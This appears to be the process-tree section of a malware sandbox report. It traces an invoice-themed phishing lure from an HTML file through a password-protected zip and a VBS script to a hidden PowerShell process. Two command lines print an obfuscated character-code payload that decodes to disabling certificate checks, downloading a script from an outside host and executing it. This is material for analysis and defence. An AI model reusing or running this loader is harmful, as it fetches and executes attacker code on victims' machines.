Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,3895141347888249468,9556767451129423605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2104 /prefetch:3
Imagebase: 0x7ff778810000
File size: 3'388'000 bytes
MD5 hash: E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 09:56:51
Start date: 13/03/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020660849.html"
Imagebase: 0x7ff778810000
File size: 3'388'000 bytes
MD5 hash: E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 09:56:56
Start date: 13/03/2025
Path: C:\Windows\SysWOW64\unarchiver.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"
Imagebase: 0xcc0000
File size: 12'800 bytes
MD5 hash: 16FF3CC6CC330A08EED70CBC1D35F5D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 09:56:56
Start date: 13/03/2025
Path: C:\Windows\SysWOW64\7za.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"
Imagebase: 0x400000
File size: 289'792 bytes
MD5 hash: 77E556CDFDC5C592F5C46DB4127C6F4C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 09:56:56
Start date: 13/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff642da0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 09:56:57
Start date: 13/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
Imagebase: 0x460000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 09:56:57
Start date: 13/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff642da0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 11
Start time: 09:56:57
Start date: 13/03/2025
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
Imagebase: 0xa40000
File size: 147'456 bytes
MD5 hash: FF00E0480075B095948000BDC66E81F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 13
Start time: 09:57:21
Start date: 13/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Imagebase: 0x460000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 09:57:21
Start date: 13/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff642da0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 09:57:21
Start date: 13/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "
                                                                                    Imagebase:0x460000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:09:57:21
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
                                                                                    Imagebase:0x250000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:09:57:22
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7c8b00000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    No disassembly